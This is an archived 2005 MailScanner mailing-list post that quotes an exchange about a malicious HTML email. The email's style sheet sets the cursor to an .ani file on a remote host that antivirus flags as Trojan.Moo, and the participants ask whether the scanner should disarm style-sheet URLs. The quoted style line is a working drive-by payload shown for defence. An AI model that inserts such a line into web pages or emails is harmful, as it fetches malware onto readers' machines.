Virus in HTML Email Style Sheet

Rick Cooper rcooper at DWFORD.COM
Tue Mar 29 16:16:09 IST 2005


    [ The following text is in the "iso-8859-1" character set. ]
    [ Your display is set for the "US-ASCII" character set.  ]
    [ Some characters may be displayed incorrectly. ]

> -----Original Message-----
> From: MailScanner mailing list [mailto:MAILSCANNER at JISCMAIL.AC.UK]On
> Behalf Of John Wilcock
> Sent: Tuesday, March 29, 2005 9:56 AM
> To: MAILSCANNER at JISCMAIL.AC.UK
> Subject: Re: Virus in HTML Email Style Sheet
>
>
> Derek Winkler wrote:
> > <style>* {CURSOR:
> url("http://banukultepe.sitemynet.com/m89.ani")}</style>*
> {CURSOR: url("http://banukultepe.sitemynet.com/m89.ani")}
> >
> > When the CURSOR is retrieved it has Trojan.Moo in it according to NAV.
> >
> > MailScanner did not catch this.
> >
> > Should there be a disarm URLs in style sheets setting in MailScanner?
>
> I can't see how this could actually result in an infection, unless the
> e-mail client has a bug that results in code being executed instead of a
> cursor being displayed. If there are any common clients out there with
> known vulnerabilities, it would indeed seem logical for Julian to do
> something about this, similar to the IFRAME disarming.
>
> Conversely, are there any legitimate uses for this sort of thing?
>



More information about the MailScanner mailing list